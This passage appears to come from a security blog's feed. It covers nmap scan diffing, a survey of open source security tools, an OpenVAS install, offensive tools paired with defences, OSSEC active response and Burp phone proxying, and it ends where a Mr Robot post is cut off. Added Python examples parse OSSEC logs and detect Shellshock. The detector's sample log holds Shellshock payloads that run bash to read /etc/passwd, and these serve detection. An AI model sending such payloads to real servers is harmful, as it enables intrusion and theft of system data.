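<host><status state="up"/><address addr="203.0.113.10" addrtype="ipv4"/><ports>
<port protocol="tcp" portid="22"><state state="open"/><service name="ssh"/></port>
<port protocol="tcp" portid="443"><state state="open"/><service name="https"/></port>
<port protocol="tcp" portid="8080"><state state="open"/><service name="http-proxy"/></port>
</ports></host>
</nmaprun>"""

NEW_SCAN = """<nmaprun scanner="nmap">
<host><status state="up"/><address addr="203.0.113.10" addrtype="ipv4"/><ports>
<port protocol="tcp" portid="22"><state state="open"/><service name="ssh"/></port>
<port protocol="tcp" portid="443"><state state="open"/><service name="https"/></port>
<port protocol="tcp" portid="8080"><state state="filtered"/><service name="http-proxy"/></port>
<port protocol="tcp" portid="3389"><state state="open"/><service name="ms-wbt-server"/></port>
</ports></host>
<host><status state="up"/><address addr="203.0.113.11" addrtype="ipv4"/><ports>
<port protocol="tcp" portid="9100"><state state="open"/><service name="jetdirect"/></port>
</ports></host>
</nmaprun>"""


def open_ports(nmap_xml):
    """Return {ipv4: {(proto, port): service}} for every open port in a scan."""
    hosts = {}
    for host in ET.fromstring(nmap_xml).iter("host"):
        addrs = [a.get("addr") for a in host.findall("address")
                 if a.get("addrtype") == "ipv4"]
        if not addrs:
            continue
        ports = hosts.setdefault(addrs[0], {})
        for port in host.iter("port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue  # closed and filtered ports are not exposure
            service = port.find("service")
            name = service.get("name", "unknown") if service is not None else "unknown"
            ports[(port.get("protocol"), int(port.get("portid")))] = name
    return hosts


def diff_scans(old_xml, new_xml):
    """Return (opened, closed): lists of (ip, proto, port, service) tuples."""
    old, new = open_ports(old_xml), open_ports(new_xml)
    opened, closed = [], []
    for ip in sorted(set(old) | set(new)):
        before, after = old.get(ip, {}), new.get(ip, {})
        for key in sorted(set(after) - set(before)):
            opened.append((ip, key[0], key[1], after[key]))
        for key in sorted(set(before) - set(after)):
            closed.append((ip, key[0], key[1], before[key]))
    return opened, closed


def main(argv):
    if len(argv) == 3:
        with open(argv[1]) as a, open(argv[2]) as b:
            old_xml, new_xml = a.read(), b.read()
    else:
        old_xml, new_xml = OLD_SCAN, NEW_SCAN  # demo run on the samples
    opened, closed = diff_scans(old_xml, new_xml)
    for ip, proto, port, svc in opened:
        print("OPENED  %s %d/%s %s" % (ip, port, proto, svc))
    for ip, proto, port, svc in closed:
        print("CLOSED  %s %d/%s %s" % (ip, port, proto, svc))
    # Non-zero exit when something new is exposed, so cron mails you.
    return 1 if opened else 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

Run it as `python3 scan_diff.py scan-last-week.xml scan-today.xml`; with no arguments it runs over the two constructed samples. Keep the XML files: they are the change history of your perimeter, which is exactly what a firewall change control process should be able to reconcile against.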

Regular port scans are simple to implement and can be incorporated with other regular security tasks. Start now before someone on the other side of the world starts abusing your printer or turns up the heat in your building.

15 Essential Open Source Security Tools https://hackertarget.com/10-open-source-security-tools/ Wed, 27 Sep 2017 11:30:15 +0000

The post 15 Essential Open Source Security Tools appeared first on HackerTarget.com.

There are thousands of open source security tools with both defensive and offensive security capabilities.

Updated in 2017 to include an additional 5 essential security tools.

The following are 15 essential security tools that will help you to secure your systems and networks. These open source security tools have been given the essential rating because they are effective, well supported and easy to start getting value from.

1. Nmap - map your network and ports with the number one port scanning tool. Nmap now features powerful NSE scripts that can detect vulnerabilities, misconfigurations and security-related information about network services. After you have Nmap installed be sure to look at the features of the included ncat; it's netcat on steroids.

2. OpenVAS - open source vulnerability scanning suite that grew from a fork of the Nessus engine when it went commercial. Manage all aspects of a security vulnerability management system from web based dashboards. For a fast and easy external scan with OpenVAS try our online OpenVAS scanner.

3. OSSEC - host based intrusion detection system or HIDS, easy to set up and configure. OSSEC has far reaching benefits for both security and operations staff.

4. Security Onion - a network security monitoring distribution that can replace expensive commercial grey boxes with blinking lights. Security Onion is easy to set up and configure. With minimal effort you will start to detect security related events on your network. Detect everything from brute force scanning kids to those nasty APTs.

5. Metasploit Framework - test all aspects of your security with an offensive focus. Primarily a penetration testing tool, Metasploit has modules that not only include exploits but also scanning and auditing.

6. OpenSSH - secure all your traffic between two points by tunnelling insecure protocols through an SSH tunnel. Includes scp, providing an easy way to copy files securely. Can be used as a poor man's VPN for open wireless access points (airports, coffee shops). Tunnel back through your home computer and the traffic is then secured in transit. Access internal network services through SSH tunnels using only one point of access. From Windows, you will probably want to have PuTTY as a client and WinSCP for copying files. Under Linux just use the command line ssh and scp.

7. Wireshark - view traffic in as much detail as you want. Use Wireshark to follow network streams and find problems. Tcpdump and Tshark are command line alternatives. Wireshark runs on Windows, Linux, FreeBSD or OSX based systems.

8. Kali Linux - built from the foundation of BackTrack Linux, Kali is a security testing Linux distribution based on Debian. It comes prepackaged with hundreds of powerful security testing tools. From Airodump-ng with wireless injection drivers to Metasploit, this bundle saves security testers a great deal of time configuring tools.

9. Nikto - a web server testing tool that has been kicking around for over 10 years. Nikto is great for firing at a web server to find known vulnerable scripts, configuration mistakes and related security problems. It won't find your XSS and SQL web application bugs, but it does find many things that other tools miss. To get started try the Nikto Tutorial or the online hosted version.

10. TrueCrypt - as of 2014, the TrueCrypt product is no longer being maintained. Two new security tools, CipherShed and VeraCrypt, were forked from it and have been through extensive security audits.

Updated 2017 to include another 5 high quality open source security tools. These additional projects are all very much focused on the defender's side, with in-depth traffic analysis, intrusion detection and incident response all covered. It is interesting to see that sponsors of these projects include Facebook, Cisco and Google.

11. Moloch - packet capture analysis, ninja style. Powered by an Elasticsearch backend, which makes searching through pcaps fast. Has great support for protocol decoding and display of captured data. With a security focus this is an essential tool for anyone interested in traffic analysis.

12. Bro IDS - touts itself as more than an Intrusion Detection System, and it is hard to argue with this statement. The IDS component is powerful, but rather than focusing on signatures as seen in traditional IDS systems, this tool decodes protocols and looks for anomalies within the traffic.

13. Snort - a real time traffic analysis and packet logging tool. It can be thought of as a traditional IDS, with detection performed by matching signatures. The project is now managed by Cisco, which uses the technology in its range of Sourcefire appliances. An alternative project is the Suricata system, which is a fork of the original Snort source.

14. OSQuery - monitors a host for changes and is built to be performant from the ground up. This project is cross platform and was started by the Facebook Security Team. It is a powerful agent that can be run on all your systems (Windows, Linux or OSX) providing detailed visibility into anomalies and security related events.

15. GRR - Google Rapid Response, a tool developed by Google for security incident response. This Python agent / server combination allows incident response to be performed against a target system remotely.

OpenVAS 9 install on Ubuntu 16.04 (https://hackertarget.com/openvas-9-install-ubuntu-1604/, Sat, 20 May 2017 10:54:44 +0000)


To install OpenVAS 9 on Ubuntu 16.04 we will use the third party binary package method. While we could build from source the packages allow us to get OpenVAS up and running quickly and with minimal fuss.

For ongoing management and troubleshooting tips check out the OpenVAS Tutorial.

OpenVAS installation

If you are installing OpenVAS into an Ubuntu virtual machine I suggest adding as much CPU as you can as this will speed up your scan times. A suggested minimum is 8GB of RAM and 4 cores. An interesting new feature mentioned in the latest release is the development towards building a distributed system for large scale deployments. Having a central console (and manager) that can delegate scans to multiple scanners is an excellent architecture for those wanting to scan large numbers of targets.

Install OpenVAS

First step is to add the PPA repository to our Ubuntu build. In this example I am using a clean server build on VMware Workstation. After running the add-apt-repository command you will receive a notice that gives a good summary of the installation process.

root@ubuntu:~# add-apt-repository ppa:mrazavi/openvas

Next apt update and install the main packages.

root@ubuntu:~# apt update
root@ubuntu:~# apt install sqlite3
root@ubuntu:~# apt install openvas9

There are a ton of packages to be installed; on my clean Ubuntu Server build a total of 175 packages and 581MB of disk space is to be used. A couple of additional packages are required for the PDF reports to work.

root@ubuntu:~# apt install texlive-latex-extra --no-install-recommends

Now some extra fonts to make those PDFs look pretty.

root@ubuntu:~# apt-get install texlive-fonts-recommended

The libopenvas9-dev package installs the openvas-nasl utility that allows you to run single OpenVAS nasl scripts, great for quick checks and troubleshooting. In the next step we are also adding the vulnerability data by syncing with the feeds.

root@ubuntu:~# apt install libopenvas9-dev
root@ubuntu:~# greenbone-nvt-sync
root@ubuntu:~# greenbone-scapdata-sync
root@ubuntu:~# greenbone-certdata-sync

Time to start the OpenVAS scanner process.

root@ubuntu:~# service openvas-scanner restart

Now a check of the running processes will show our scanner loading the NVTs.

root@ubuntu:~# ps -ef | grep openvas
root      34149      1  0 00:22 ?        00:00:00 gpg-agent --homedir /var/lib/openvas/openvasmd/gnupg --use-standard-socket --daemon
root      34241      1  0 00:22 ?        00:00:01 openvasmd
root      37861      1 55 02:01 ?        00:00:02 openvassd: Reloaded 8550 of 53269 NVTs (16% / ETA: 00:20)
root      37862  37861  0 02:01 ?        00:00:00 openvassd (Loading Handler)
root      37864  25921  0 02:01 pts/1    00:00:00 grep --color=auto openvas

Using netstat -an we can see that gsad is now running on port 4000. Another thing to notice is that openvasmd and openvassd are using sockets rather than listening on TCP ports.

An extra package is required if we want to be able to test Microsoft SMB services for critical vulnerabilities such as MS17-010. This particular Microsoft patch is of note as it fixes the vulnerability that has been keeping IT staff busy since the WannaCry ransomware attack started spreading around the world. Of course any penetration tester will be familiar with MS08-067, a previous favourite vulnerability for attacking Windows 2003 systems.

apt install smbclient

Now let's restart the openvas-manager and rebuild the cache. Rebuilding the cache ensures the feed that we synced is all loaded up into the manager and we are ready to start testing.

root@ubuntu:~# service openvas-manager restart
root@ubuntu:~# openvasmd --rebuild --progress
Rebuilding NVT cache... done.

If you have any issues the log files contain the information for troubleshooting. OpenVAS logs can be found in the following location.

/var/log/openvas
/var/log/openvas/gsad.log
/var/log/openvas/openvasmd.log
/var/log/openvas/openvassd.dump
/var/log/openvas/openvassd.messages

We should be now all ready to load up the web interface and start testing. Don't forget we are on a new port number. The default user and password is admin / admin.

https://192.168.1.254:4000

Getting Started with OpenVAS 9

After completing the installation and syncing the vulnerability feed, log in to the web interface using the default credentials (don't forget to change your password!).

1. Add a target

Using the web interface select Configuration | Targets to add a new target to scan. Note the little star icon in the top left corner is the "add" button (this carries through to the other screens as well).

2. Add a task

Select Scans | Tasks option to now add a new task. For your first scan you can stick with the defaults, simply select the scan target that you added in step 1 and hit create.

3. Start Scan

Now it is simply a matter of hitting the play button for the task to kick the scan off. Once the scan has completed you will be able to review results under Scans | Reports. Reports can be downloaded in HTML / XML / PDF and other formats or you can review the results in the web interface.

Sample OpenVAS Reports

Each of the following tests was conducted using a black box approach. In such a test the vulnerability scanner is run against a target with no prior knowledge of, or credentialed access to, the system.


Windows 2003 - End of life and an impressive list of vulnerabilities in a default install. Probably should upgrade.

Windows 7 - In this test the firewall has been disabled. Multiple issues discovered including MS17-010.

Metasploitable - This target is a deliberately insecure system. It is used for testing and has many critical vulnerabilities.

Wrapping Up

The installation of OpenVAS 9 on Ubuntu was found to be a smooth process, with no hiccups or gotchas encountered. The OpenVAS project is heavily supported and developed by Greenbone Networks; if you are after a comprehensive vulnerability scanning solution you should check them out. Complement their appliances for testing your internal corporate networks with our hosted vulnerability scanners to secure the network perimeter.

11 Offensive Security Tools for SysAdmins (https://hackertarget.com/11-offensive-security-tools/, Tue, 27 Sep 2016 11:44:32 +0000)

Offensive security tools are used by security professionals for testing and demonstrating security weakness. Systems Administrators and other IT professionals will benefit from having an understanding of at least the capabilities of these tools. Benefits include preparing systems to defend against these types of attacks and being able to identify the attacks in the case of an incident.

This selection of tools, when utilized by a moderately skilled attacker, has the potential to wreak havoc on an organization's network.

If you are interested in testing these tools they are all available to download and use for FREE. Most are open source with a couple of exceptions. They should not be used against systems that you do not have permission to attack. You could end up in jail.

The mitigations listed for each tool are high level pointers to techniques that a systems administrator should consider for defending against these powerful tools. Further information can be found at the project sites for each of the tools.

While some of the recommendations may appear to be common sense; far too often the basics are overlooked.

Metasploit Framework
Metasploit Framework - an open source tool for exploit development and penetration testing. Metasploit is well known in the security community. Metasploit has exploits for both server and client based attacks, with feature packed communication modules (Meterpreter) that make pwning systems fun! The framework now includes Armitage for point and click network exploitation. This is the go to tool if you want to break into a network or computer system.

Defending against Metasploit:

  • Keep all software updated with the latest security patches.
  • Use strong passwords on all systems.
  • Deploy network services with secure configurations.

Ettercap
Ettercap - a suite of tools for man in the middle attacks (MITM). Once you have initiated a man in the middle attack with Ettercap use the modules and scripting capabilities to manipulate or inject traffic on the fly. Sniffing data and passwords are just the beginning; inject to exploit FTW!

Defending against Ettercap:

  • Understand that ARP poisoning is not difficult in a typical switched network.
  • Lock down network ports.
  • Use secure switch configurations and NAC if risk is sufficient.

SSLStrip
sslstrip - using HTTPS makes people feel warm, fuzzy and secure. Using sslstrip this security can be attacked, reducing the connection to an unencrypted HTTP session, whereby all the traffic is readable. Banking details, passwords and emails from your boss all in the clear. Even includes a nifty feature where the favicon on the unencrypted connection is replaced with a padlock just to make the user keep that warm and fuzzy feeling.

Defending against sslstrip:

  • Be aware of the possibility of MITM attacks (arp, proxies / gateway, wireless).
  • Look for sudden protocol changes in the browser address bar. Not really a technical mitigation!

Evilgrade
evilgrade - another man in the middle attack. Everyone knows that keeping software updated is the way to stay secure. This little utility fakes the upgrade and provides the user with a not so good update. It can exploit the upgrade functionality of around 63 pieces of software including Opera, Notepad++, VMware, VirtualBox, iTunes, QuickTime and Winamp! It really whips the llama's ass!

Defending against evilgrade:

  • Be aware of the possibility of MITM attacks (arp attacks, proxy / gateway, wireless).
  • Only perform updates to your system or applications on a trusted network.

Social Engineer Toolkit
Social Engineer Toolkit - makes creating a social engineered client side attack way too easy. Creates the spear phish, sends the email and serves the malicious exploit. SET is the open source client side attack weapon of choice.

Defending against SET:

  • User awareness training around spear phishing attacks.
  • Strong Email and Web filtering controls.

SQLmap
sqlmap - SQL injection is an attack vector that has been around for over 10 years. Yet it is still the easiest way to get dumps of entire databases of information. Sqlmap is not only a highly accurate tool for detecting SQL injection; it also has the capability to dump information from the database and even launch attacks that can result in operating system shell access on the vulnerable system.

Defending against sqlmap:

  • Filter all input on dynamic websites (secure the web applications).
  • Use mod_proxy or other web based filtering controls to help block malicious injection attacks (not ideal, as attackers are often able to bypass these web application firewalls (WAF)).

Aircrack-NG
aircrack-ng - breaking holes in wireless networks for fun and profit. A suite of tools that enables all manner of wireless network attacks.

Defending against aircrack-ng:

  • Never use WEP
  • When using WPA2 with pre-shared keys, ensure passwords are strong (10+ characters non-dictionary based passwords).

oclHashcat
oclHashcat - Need to get some passwords from the hashes you grabbed with sqlmap? Use this tool to bust them open. Over 48 different hashing algorithms supported. Will use the GPU (if supported) on your graphics card to find those hashes many times faster than your clunky old CPU.

Defending against oclHashcat:

  • Passwords are the weakest link. Enforce password complexity.
  • Protect the hashed passwords.
  • Salt the hashes.

ncrack
ncrack - Brute force network passwords with this tool from Fyodor the creator of Nmap. Passwords are the weakest link and Ncrack makes it easy to brute force passwords for RDP, SSH, http(s), SMB, pop3(s), VNC, FTP, and telnet.

Defending against ncrack:

  • Use strong passwords everywhere.
  • Implement time based lockouts on network service password failures.

Cain and Abel
Cain and Abel - cracking passwords, sniffing VoIP and man in the middle (MITM) attacks against RDP are just a few examples of the many features of this Windows only tool.

Defending against Cain and Abel:

  • Be aware of the possibility of MITM attacks (arp attacks, untrusted proxy / gateway, wireless).
  • Use strong passwords everywhere.

Tor Network
Tor - push your traffic through this onion network that is designed to provide anonymity to the user. Note your traffic from the exit node is not encrypted or secured. Make sure you understand what it does before using it, Tor provides anonymity not encrypted communication.

Defending against Tor:

  • It is possible to implement blocking of Tor exit nodes on your firewall, if Tor traffic is linked to a threat to your environment.

If you are interested in testing these offensive security tools you should take a look at the Kali Linux distribution. It includes many of these and other tools pre-installed.

These tools are used by security professionals around the world to demonstrate security weakness.

Only experiment on your local network where you have permission.
Do not do anything stupid. You could end up in jail.

Enable OSSEC Active Response (https://hackertarget.com/enable-ossec-active-response/, Tue, 06 Sep 2016 10:46:57 +0000)

Many OSSEC users start off running with active response disabled to ensure that the OSSEC agent does not affect the server, especially when running in a live production environment. Once you have an understanding of the number and types of alerts you are seeing, it is a good idea to enable active response.

The advantages of running OSSEC on your servers are pretty obvious, especially when you start to get a few alerts, even if they are false positives. It is a quick and easy way to ensure that any "interesting" changes or security events are noticed, by simply sending an email to the configured email address. Blocking is simply the next step in defence. If services are being brute forced, then you can simply block the IP address that is performing the brute force.

An important part of any monitoring system is to minimise the noise that an admin or analyst is subjected to. Reducing the noise ensures that legitimate alerts are noticed and followed up for analysis.

After configuring OSSEC in a default configuration with active response disabled, you will need to enable it by modifying two sets of configuration parameters in the /var/ossec/etc/ossec.conf file.

Add a command block to /var/ossec/etc/ossec.conf. This gives a name to the executable that you are going to run (typically located in /var/ossec/active-response/).

  <command>
    <name>firewall-drop</name>
    <executable>firewall-drop.sh</executable>
    <expect>srcip</expect>
    <timeout_allowed>yes</timeout_allowed>
  </command>

Now enable active response on specific rules or all rules above a certain alert level.

  <active-response>
    <disabled>no</disabled>
    <command>firewall-drop</command>
    <agent_id>001</agent_id>
    <location>local</location>
    <rules_id>31510</rules_id>
    <level>8</level>
    <timeout>600</timeout>
  </active-response>

Rather than naming a specific rule in the active-response block, rules_id can be omitted, and every rule that triggers above level 8 and carries a source IP will cause that IP to be blocked by the firewall-drop script using iptables for a period of 600 seconds (10 minutes). Note that the command block needs to be higher in the ossec.conf file than the active-response block.

To see how effective your active response is, take a look at /var/ossec/logs/active-responses.log. Here is a snippet from one of my logs. All the noisy bots are being blocked. Alerts for this noise no longer appear in my inbox as they are simply quietly blocked.

Sun Aug 14 11:55:04 UTC 2016 /var/ossec/active-response/bin/firewall-drop.sh add - 192.1xx.250.89 1471175704.407764 31510
Sun Aug 14 12:05:34 UTC 2016 /var/ossec/active-response/bin/firewall-drop.sh delete - 192.1xx.250.89 1471175704.407764 31510
Sun Aug 14 14:34:25 UTC 2016 /var/ossec/active-response/bin/firewall-drop.sh add - 103.255.xx.69 1471185265.450999 31153
Sun Aug 14 14:44:55 UTC 2016 /var/ossec/active-response/bin/firewall-drop.sh delete - 103.2xx.15.69 1471185265.450999 31153
Mon Aug 15 23:16:49 UTC 2016 /var/ossec/active-response/bin/firewall-drop.sh add - 82.166.1xx.x4 1471303009.783488 31510
Mon Aug 15 23:27:19 UTC 2016 /var/ossec/active-response/bin/firewall-drop.sh delete - 82.1xx.1x9.94 1471303009.783488 31510
Tue Aug 16 11:43:14 UTC 2016 /var/ossec/active-response/bin/firewall-drop.sh add - 91.200.1x.x47 1471347794.946259 31510
Tue Aug 16 11:53:45 UTC 2016 /var/ossec/active-response/bin/firewall-drop.sh delete - 91.20x.xx2.47 1471347794.946259 31510
Tue Aug 16 11:53:47 UTC 2016 /var/ossec/active-response/bin/firewall-drop.sh add - 91.20x.xx.47 1471348427.992693 31510
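An added example, not code from the post or from the OSSEC project, that reads an active-responses.log in the layout shown above and pairs each add with its delete, so you can see how long blocks actually last, which rules fire, and which sources keep coming back; the sample log is constructed with documentation IP ranges rather than the author's redacted addresses.

```python
"""Summarise OSSEC active-responses.log: block durations, blocks per rule,
sources still blocked and repeat offenders.

Added example for the log above; not code from the HackerTarget post or
from OSSEC. SAMPLE_LOG is constructed in the same layout as the post's log
(date, script, action, user, source IP, alert id, rule id) using
documentation IP ranges.
"""
import re
from collections import Counter
from datetime import datetime

SAMPLE_LOG = """\
Sun Aug 14 11:55:04 UTC 2016 /var/ossec/active-response/bin/firewall-drop.sh add - 198.51.100.23 1471175704.407764 31510
Sun Aug 14 12:05:34 UTC 2016 /var/ossec/active-response/bin/firewall-drop.sh delete - 198.51.100.23 1471175704.407764 31510
Sun Aug 14 14:34:25 UTC 2016 /var/ossec/active-response/bin/firewall-drop.sh add - 203.0.113.77 1471185265.450999 31153
Sun Aug 14 14:44:55 UTC 2016 /var/ossec/active-response/bin/firewall-drop.sh delete - 203.0.113.77 1471185265.450999 31153
Tue Aug 16 11:43:14 UTC 2016 /var/ossec/active-response/bin/firewall-drop.sh add - 198.51.100.23 1471347794.946259 31510
Tue Aug 16 11:53:45 UTC 2016 /var/ossec/active-response/bin/firewall-drop.sh delete - 198.51.100.23 1471347794.946259 31510
Tue Aug 16 11:53:47 UTC 2016 /var/ossec/active-response/bin/firewall-drop.sh add - 198.51.100.23 1471348427.992693 31510
"""

LINE_RE = re.compile(
    r"^(?P<dow>\w{3}) (?P<mon>\w{3}) +(?P<day>\d{1,2}) (?P<time>\d{2}:\d{2}:\d{2}) "
    r"(?P<tz>\S+) (?P<year>\d{4}) (?P<script>\S+) (?P<action>add|delete) "
    r"(?P<user>\S+) (?P<srcip>\S+) (?P<alert_id>\S+) (?P<rule_id>\d+)$")


def parse_log(text):
    """Return one event dict per well-formed line; malformed lines are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        ev = m.groupdict()
        # The zone token is dropped; OSSEC writes the host's local zone.
        ev["when"] = datetime.strptime(
            "%(mon)s %(day)s %(year)s %(time)s" % ev, "%b %d %Y %H:%M:%S")
        events.append(ev)
    return events


def pair_blocks(events):
    """Match each 'add' with the 'delete' sharing its source IP and alert id.

    A block whose delete has not been logged yet is still active (removed=None).
    """
    open_blocks, blocks = {}, []
    for ev in events:
        key = (ev["srcip"], ev["alert_id"])
        if ev["action"] == "add":
            blk = {"srcip": ev["srcip"], "rule_id": ev["rule_id"],
                   "added": ev["when"], "removed": None, "duration_s": None}
            open_blocks[key] = blk
            blocks.append(blk)
        elif key in open_blocks:
            blk = open_blocks.pop(key)
            blk["removed"] = ev["when"]
            blk["duration_s"] = int((blk["removed"] - blk["added"]).total_seconds())
    return blocks


def summarize(blocks):
    """Counts per rule, sources still blocked, and the longest completed block."""
    durations = [b["duration_s"] for b in blocks if b["duration_s"] is not None]
    return {
        "blocks_per_rule": dict(Counter(b["rule_id"] for b in blocks)),
        "still_blocked": sorted({b["srcip"] for b in blocks if b["removed"] is None}),
        "max_duration_s": max(durations) if durations else None,
    }


def repeat_offenders(blocks, min_count=2):
    """Sources blocked at least min_count times: candidates for a longer timeout."""
    counts = Counter(b["srcip"] for b in blocks)
    return sorted((ip, n) for ip, n in counts.items() if n >= min_count)


if __name__ == "__main__":
    blocks = pair_blocks(parse_log(SAMPLE_LOG))
    for b in blocks:
        shown = "%ds" % b["duration_s"] if b["duration_s"] is not None else "(active)"
        print("%-15s rule %s blocked %s" % (b["srcip"], b["rule_id"], shown))
    print(summarize(blocks))
    print("repeat offenders:", repeat_offenders(blocks))
```

The duration column is the quick check that the deletes line up with the configured timeout, and repeat_offenders is the list worth reviewing when deciding whether 600 seconds is long enough for persistent sources.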

That's it folks, I have written about OSSEC before and still find it to be very useful and an important part of any server build.

Proxy your Phone to Burp (https://hackertarget.com/proxy-phone-burp/, Tue, 27 Oct 2015 10:02:48 +0000)

In this guide we configure Burp Suite to proxy all the traffic from your phone, tablet or other wifi device. As a bonus you will also have full access to all the WIFI packets for consumption by Wireshark or your traffic analysis tool of choice.

Use this traffic analysis technique to hunt bug bounties in your favorite Android or iOS APP.

What do I need?

  • An old laptop with an Ethernet port and a wireless adapter
  • Ubuntu running on the old laptop. Any Linux will do, but this guide uses Ubuntu 14.04
  • Burp running on any computer on your local network

Here is how it works

1. Configure the laptop as a Wireless Router

Hook the laptop up to the local network using the Ethernet adapter and make sure you can browse the Internet (using the Ethernet adapter).

Using Network Manager, configure a new wireless network in infrastructure mode:
1. untick the enable wifi option to temporarily disable the WIFI
2. select edit connections
3. add new wireless network (set ssid and mode to infrastructure)
4. name the access point (mytestingaccesspoint)
5. in IPv4 change method to "Shared to other computers", this is a quick way to sort out DHCP and NAT for your new wireless network.
6. set security (set a password)

Edit the file /etc/NetworkManager/system-connections/mytestingaccesspoint

Find the line that has mode=infrastructure and change it to mode=ap. This is required as AP is not an option in Network Manager. Note that not all wireless cards support the AP mode.

Once you have this network (mytestingaccesspoint) enabled, your wireless devices should be able to see it and connect using the password you have set.

If you can browse the network from your mobile device, on your laptop you will see two different IP ranges for your wireless adapter (wlan0) and the ethernet (eth0) adapter. The Ubuntu laptop is forwarding the traffic from the new wireless network onto the Ethernet network and out to the internet.

Try tcpdump -i wlan0 on the laptop. Fire up some apps on your phone or a browser. You should see traffic; this is your mobile device traffic. If your wireless device is not wlan0 you will need to use the correct device in the forward rule below so make sure this works.

2. Forward Traffic to Burp for Transparent Proxying

That concludes the first part of the guide, getting the mobile device traffic to route through a Linux enabled system. Now in the second part of the guide we will simply use an iptables NAT table rule to forward all HTTP port 80 traffic to the Burp Proxy running on another system.

Once we get the HTTP traffic into the Burp proxy server we can view, intercept and even inject on HTTP requests.

It only takes one line, on your Linux based router (the laptop).

iptables -t nat -A PREROUTING -i wlan0 -p tcp --dport 80 -j DNAT --to 192.168.1.100:8080

Now in Burp you need to set the proxy to listen on all IP addresses and there are two other options that are required for transparent proxying.

Note that with these changes you are opening up Burp Suite, make sure you understand the changes.

1. Select the Proxy Tab | Options | Edit the Running Proxy | Change to Bind All interfaces

2. While you are here select "Request Handling" and tick the option to Support invisible proxying (if you need this). Without it you will likely get an error when you attempt to proxy the HTTP traffic transparently.

3. Still on the Proxy Options tab, scroll down to the bottom and select "Allow Requests to web interface using fully qualified DNS hostnames".

dd-wrt as an alternative

If you have a compatible router you might be able to use dd-wrt or other firmware project to install Linux on your SOHO router. With Linux on your router you could use a similar port forward rule to push port 80 traffic to burp. There are lots of options available, one of the advantages of the old laptop method is if you mess up on the Laptop the rest of the household can still use the Internet (unless of course you really mess it up). Have fun... 🙂

Exploring the Hacker Tools of Mr Robot (https://hackertarget.com/hacker-tools-mr-robot/, Fri, 21 Aug 2015 11:51:37 +0000)


Over the years the most famous hacking tool that has made it into the movies is Nmap. When producers of a movie actually try to put a dose of reality into the computer hacking scenes, Nmap will often flash up on the screen. AFAIK Trinity was the first, in The Matrix. Nmap has also appeared in Elysium, The Bourne Ultimatum, Die Hard 4 and many others.

The debut season of Mr Robot has received a nod from the security focused twitters for its attempts at trying to keep things for the most part realistic. In the episodes so far we have seen hacker types communicating using IRC, there are Linux boxes as far as the eye can see and the main character wears a hoodie. Of course it is a television show that has to be entertaining so we have to give them some slack in getting a bit creative. So far they seem to be doing a pretty good job at maintaining a balance between the story and what is technically possible.

Here is a quick overview of some of the tools that have appeared in the show so far.

Kali Linux

In multiple scenes we can see references to the Kali Linux distribution, a complete operating system that has been packaged with configured and ready to use penetration testing (hacking) tools. If you are interested in learning about network security, get a copy of this and start playing! ** Only in your lab network of course! Breaking into computers you do not own is illegal in most parts of the world **.

Wget, Shellshock and John the Ripper

Wget is a terminal program to make HTTP requests, a popular use case is to simply download the source of a web page or grab a file from a web server in a terminal.

Here this handy tool is used to compromise a system using one of the big vulnerabilities of 2014, the Shellshock bug. You can see the commands being sent in the User-Agent of the request to the web server; the command in the screenshot is simply cat /etc/passwd.

While success was achieved here getting the /etc/passwd file, without the /etc/shadow file that contains the password hashes the next line where John the Ripper is launched is never going to work.
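From the defender's side, an added example (not code from the post) that runs over combined-format web server access logs and flags requests carrying the Shellshock function-definition prefix in the User-Agent, Referer or request line, since each of those ends up in a CGI environment variable; the log lines are constructed.

```python
"""Flag Shellshock-style payloads in combined-format web server access logs.

Added example for the Shellshock scene above; not code from the HackerTarget
post. A Shellshock payload arrives in a header that the web server copies
into a CGI environment variable (User-Agent, Referer and the request line
all qualify) and always starts with an empty Bash function definition,
"() {". SAMPLE_LOG lines are constructed, not real traffic.
"""
import re
from collections import Counter

# Fixed prefix of every Shellshock payload; what follows the brace varies.
SHELLSHOCK_RE = re.compile(r"\(\s*\)\s*\{")

# Combined log format. Apache writes \" when a logged header contains a
# double quote, so quoted fields must accept escaped characters.
_Q = r'"((?:[^"\\]|\\.)*)"'
COMBINED_RE = re.compile(
    r"^(\S+) \S+ \S+ \[([^\]]+)\] " + _Q + r" (\d{3}) (\S+) " + _Q + " " + _Q + "$")

# Constructed sample: one source tries the User-Agent and then the Referer;
# two ordinary requests contain parentheses but no function definition.
SAMPLE_LOG = "\n".join([
    r'198.51.100.8 - - [14/Aug/2016:11:55:04 +0000] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/48.0"',
    r'203.0.113.9 - - [14/Aug/2016:11:56:12 +0000] "GET /cgi-bin/status HTTP/1.1" 200 2048 "-" "() { :;}; /bin/bash -c \"cat /etc/passwd\""',
    r'203.0.113.9 - - [14/Aug/2016:11:56:13 +0000] "GET /cgi-bin/status HTTP/1.1" 500 512 "() {:;}; /bin/bash -c id" "curl/7.47.0"',
    r'198.51.100.8 - - [14/Aug/2016:11:57:40 +0000] "GET /docs/bash(1).html HTTP/1.1" 200 900 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1)"',
])


def parse_combined(line):
    """Split one combined-format line into its fields, or return None."""
    m = COMBINED_RE.match(line.strip())
    if not m:
        return None
    ip, ts, request, status, size, referer, ua = m.groups()
    return {"ip": ip, "ts": ts, "request": request, "status": status,
            "size": size, "referer": referer, "ua": ua}


def find_shellshock(log_text):
    """One hit per request whose User-Agent, Referer or request line carries
    the "() {" prefix; the first matching field is kept as evidence."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_combined(line)
        if rec is None:
            continue
        parts = rec["request"].split(" ")
        for field in ("ua", "referer", "request"):
            if SHELLSHOCK_RE.search(rec[field]):
                hits.append({"ip": rec["ip"], "ts": rec["ts"], "status": rec["status"],
                             "path": parts[1] if len(parts) > 1 else rec["request"],
                             "field": field, "evidence": rec[field]})
                break
    return hits


def attempts_by_source(hits):
    """Source IP -> number of attempts, for triage or a block list."""
    return dict(Counter(h["ip"] for h in hits))


if __name__ == "__main__":
    hits = find_shellshock(SAMPLE_LOG)
    for h in hits:
        # A 200 on a CGI path deserves the first look: the command may have run.
        print("%s %s status=%s path=%s via %s: %s" % (
            h["ts"], h["ip"], h["status"], h["path"], h["field"], h["evidence"]))
    print(attempts_by_source(hits))
```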


Canbus Hacking

